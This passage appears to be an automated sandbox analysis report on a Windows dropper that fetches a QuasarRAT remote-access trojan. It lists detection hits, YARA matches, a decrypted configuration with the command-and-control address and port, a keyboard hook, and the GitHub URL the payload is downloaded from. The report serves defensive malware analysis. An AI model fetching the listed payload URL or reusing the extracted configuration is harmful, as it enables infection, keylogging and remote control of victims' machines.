gSvd1Ja/cqzjUb56fU4volehkDVt+XD+udV3KndKDCCwx0JEo4d/u+PHA9Q14Lw13dNWGL4zS7vqOzHYPGkeONKbq3RusCL6rzq7VcCQtg7CrB/cfuBx3cWGbM58uuLIQwoYmHrWqZo9UA7FNsodRUz+bwVokS90KzHSORD1bTc7VfotLt0P95UTm58zfgHd7CCqbjCNdaVU6JisRdkRwKr/r79j9z306SIvr1Qs6bRZw="}
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeReversingLabs: Detection: 95%
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeReversingLabs: Detection: 95%
                  Source: C:\WCTVN\mmytljldrgl.exeReversingLabs: Detection: 95%
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeReversingLabs: Detection: 21%
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeVirustotal: Detection: 26%Perma Link
                  Source: Yara matchFile source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                  Source: Yara matchFile source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeJoe Sandbox ML: detected
                  Source: C:\WCTVN\mmytljldrgl.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exeJoe Sandbox ML: detected
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeJoe Sandbox ML: detected
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: 1.4.1
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: 87.228.57.81:4782;
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: SubDir
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: Client.exe
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: cf3988ab-2fd9-4544-a16f-9faa71eb5bac
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: svchoost.exe
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: githubyt
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: Logs
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: SSSXaR44GRb6RYmfFpZjNvvxDEF0KI5jH8nAxi6KcQzCkmdFj4EmiNa7wzIn6QlTh6m9p8r0dvOdGcKp9R7a0feJ+9nftufivecVEcRMW+w9A0X3vAKDbhMDGoJK/oCpkIWanwn5htUKhAJB1lNPjwjIbjG59Xr7nQuXbI0zG8R5zUBqkB7LcDn23y9ViJS55kXsDdCMrrrzn3PsDzs0HTUE4E9W1OuqLpiq9ipYZce25NDQPlIfeAVgyRYzjvec4Uu1mthPaSYUvBiWdDBx5a+gN5tH6ZXROlVMsEMnIJhg/hN/HZVnynGXWaXLgqXtOtfSU5CWH4htKhRkXVbV4yhbXcIXhxL3G2FtXHDDWQjdiYyXKkTx8/z5tnTaobjzjutR8DMWLMg0D/zOKCP0VwSU5Vqn1N5RGbaOinPoUyKL1/3G9eTNYXnl00LzeENlA+hxJ6TyB9hsv85lArDm3jZ5ixI+Bl9M4ajNwTXVY8p+s41nOYrSammq6OgAThh4nd2GWivTLvpgYzJ7NWJM2yWObOFCJlLqdFVlOme65jzZyWtRSYx57sdgOVsNs5/OOJz6jSBSzEq3N0TN/hzpwQ6Tvxj0Xvvwn9DNmHiWLLE13tGYBkJfg+WVKW3m6MINZOm8VZ019XPs+RldMn2Kbu5SMX3WNIN7zvPGpR2mcRw=
                  Source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmpString decryptor: MIIE9jCCAt6gAwIBAgIQAMCIrkV3lAMp6Vz+9SYptTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjQxNzU0MjFaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCLqDcacB918PiS52/zK8NuYRFBjeeZXbEfkolana8gflQhGUIyaXW73olgd952Z18rz4CBCX2jb1f+vqHqWwbwIiVt+Ek8urXFgrOXR2CMqV/HE3QRvviIPkrLKGUsAOue2cN0CRvgEnhMpw80CsO2ZJLCoD3NHsLp+1kY7HQalZeCDuyF9F/1zoRogBQ+yYyNDshY/FTdxRak/6a2WjSD0FJpHkMNKTvCYxi2AIILH57Cyz5dr6pD/s4T+2TiiBK2SlOqm2IQ7zkcfI5rRyie1Q4UwUK1Q7+AXni7Al7XYNH5n5sHGylOW55Sf1uX8rhD7dt/rVxv4IroQeXh0ULwnZkTzHxpjLUclv7FjqSSBegcF98uGdqJzZQDHzwUPEMqJvQ4ikZBKRZtDhReWYAZoobYHxrhAv471L6Ik7hWs8VE+DFifQu2WuV11N37JQR29uwCNMyRBGEmM02YHy36zxs8cjolbQO1HaNfAKfevaezg8czVT7XAgI72i27By9HfruniOU2xjpa1ZlHKGEi7GrYSplhZcflqbYrYdEy15VQ382yt3zkJo7DYkvGIhL2D4tt176o2yF7bm/EaLn8ID5qexn2oubC5o8HCe+KtnkfS4ARLmdpJg4U6pcZUbEbd7enqJ6LAUTJ7Gi3+NFXtPRm0lT5PRYemLHIcNaNjQIDAQABozIwMDAdBgNVHQ4EFgQUkztLutpnSBqQonmJDkIlJzumy2AwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAPw0vebSaYmKRfSaRE1e2YgOVyx+WZgXuPUUY7YjGpwYNRkjgtPNgsMtZDS3jXhhXBsyKsKGDcnS51Gz5c9wV4YxjoZRzXnIom0Ia1WXfifdugNvIRkKgNS3kn0SfHUjgjktUtZxAfUqiGJn2QipIDB5b+tEBG5J9PYWmNC+3205Z5cl9Ti9KgXN3FKf+/slRaE3ACPJlTdRIg3S5u7uFIKtEUkSE1WuhQi6Lyms2a0rILI3e53o+YmpSys1YOafIDUP8UboM9ktsJY4V3zcFheChn15IE+a8LJYcRAIsJbjPCw2Jo/z6R3+XY/U7nFyS5tU9oIjtDpndOOErtnVgiMeGNPmkEY3SvkEYjS8TXovcSJa00nj+yHapZxrzn9MYFYyP1lIlmhnnU+RnY5jhQVlnhccExAAb7BKXnuVI2EraVaz9wxHEUnD/3kzJj7gSvd1Ja/cqzjUb56fU4volehkDVt+XD+udV3KndKDCCwx0JEo4d/u+PHA9Q14Lw13dNWGL4zS7vqOzHYPGkeONKbq3RusCL6rzq7VcCQtg7CrB/cfuBx3cWGbM58uuLIQwoYmHrWqZo9UA7FNsodRUz+bwVokS90KzHSORD1bTc7VfotLt0P95UTm58zfgHd7CCqbjCNdaVU6JisRdkRwKr/r79j9z306SIvr1Qs6bRZw=
                  Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
                  Source: Binary string: C:\Users\Administrator\Desktop\libranceroom\x64\Release\libranceroom.pdb/ source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A3798 FindFirstFileExW,0_2_00007FF7E76A3798

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 87.228.57.81:4782 -> 192.168.2.4:49739
                  Source: Malware configuration extractorURLs: 87.228.57.81
                  Source: global trafficTCP traffic: 192.168.2.4:49739 -> 87.228.57.81:4782
                  Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
                  Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                  Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                  Source: Joe Sandbox ViewASN Name: INF-NET-ASRU INF-NET-ASRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownDNS query: name: ipwho.is
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.228.57.81
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7682DC0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF7E7682DC0
                  Source: global trafficHTTP traffic detected: GET /temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe HTTP/1.1User-Agent: MyAppHost: github.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /temperloin/piponis/refs/heads/main/mmytljldrgl.exe HTTP/1.1User-Agent: MyAppCache-Control: no-cacheHost: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: github.com
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: ipwho.is
                  Source: Client.exe, 0000001B.00000002.2970279187.000000001BE8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: Client.exe, 0000001B.00000002.2941270172.00000000014F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en089
                  Source: Client.exe, 0000001B.00000002.2946566856.00000000034AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwho.is
                  Source: powershell.exe, 00000011.00000002.1866240120.000001D721514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: Client.exe, 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: powershell.exe, 00000011.00000002.1848192756.000001D7116C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000011.00000002.1848192756.000001D7114A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.0000015700001000.00000004.00000800.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000002.2089381424.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000001B.00000002.2946566856.0000000003109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000011.00000002.1848192756.000001D7116C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000011.00000002.1872774385.000001D729740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                  Source: powershell.exe, 00000011.00000002.1848192756.000001D7114A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1905001429.0000015700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.drString found in binary or memory: https://api.ipify.org/
                  Source: powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                  Source: powershell.exe, 00000015.00000002.1905001429.000001570022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/X
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeString found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe
                  Source: ConDrv.0.drString found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe...
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe2
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exe=
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/temperloin/piponis/raw/refs/heads/main/mmytljldrgl.exeg
                  Source: Client.exe, 0000001B.00000002.2946566856.0000000003491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is
                  Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe, 0000001B.00000002.2946566856.0000000003491000.00000004.00000800.00020000.00000000.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.drString found in binary or memory: https://ipwho.is/
                  Source: powershell.exe, 00000011.00000002.1866240120.000001D721514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1965574062.0000015710074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
                  Source: SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe, 00000000.00000002.2060973900.0000026F8A992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/temperloin/piponis/refs/heads/main/mmytljldrgl.exe
                  Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.drString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe, 0000001B.00000002.2946566856.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.drString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: mmytljldrgl.exe, 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, mmytljldrgl.exe, 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, Client.exe.24.dr, mmytljldrgl.exe.0.dr, mmytljldrgl[1].exe.0.drString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49740 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SubDir\Client.exeJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7681FF0 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,0_2_00007FF7E7681FF0

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                  Source: Yara matchFile source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED

                  System Summary

                  barindex
                  Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPEDMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                  Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: C:\WCTVN\mmytljldrgl.exe, type: DROPPEDMatched rule: Detects Quasar infostealer Author: ditekshen
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E769DF880_2_00007FF7E769DF88
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76827900_2_00007FF7E7682790
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76857900_2_00007FF7E7685790
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76835200_2_00007FF7E7683520
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76AACC80_2_00007FF7E76AACC8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76823500_2_00007FF7E7682350
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76941E80_2_00007FF7E76941E8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76930580_2_00007FF7E7693058
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76988380_2_00007FF7E7698838
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A00E80_2_00007FF7E76A00E8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A97180_2_00007FF7E76A9718
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76928100_2_00007FF7E7692810
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A37980_2_00007FF7E76A3798
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E769E6900_2_00007FF7E769E690
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E769CE440_2_00007FF7E769CE44
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76AA62C0_2_00007FF7E76AA62C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76935640_2_00007FF7E7693564
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E769260C0_2_00007FF7E769260C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A54F80_2_00007FF7E76A54F8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E769D4C40_2_00007FF7E769D4C4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7695B580_2_00007FF7E7695B58
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A23280_2_00007FF7E76A2328
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A82600_2_00007FF7E76A8260
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7699B000_2_00007FF7E7699B00
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E769612C0_2_00007FF7E769612C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7692A140_2_00007FF7E7692A14
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E76A6A080_2_00007FF7E76A6A08
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E7696A000_2_00007FF7E7696A00
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exeCode function: 0_2_00007FF7E769C9B00_2_00007FF7E769C9B0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BB82E1117_2_00007FFD9BB82E11
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BBA30B221_2_00007FFD9BBA30B2
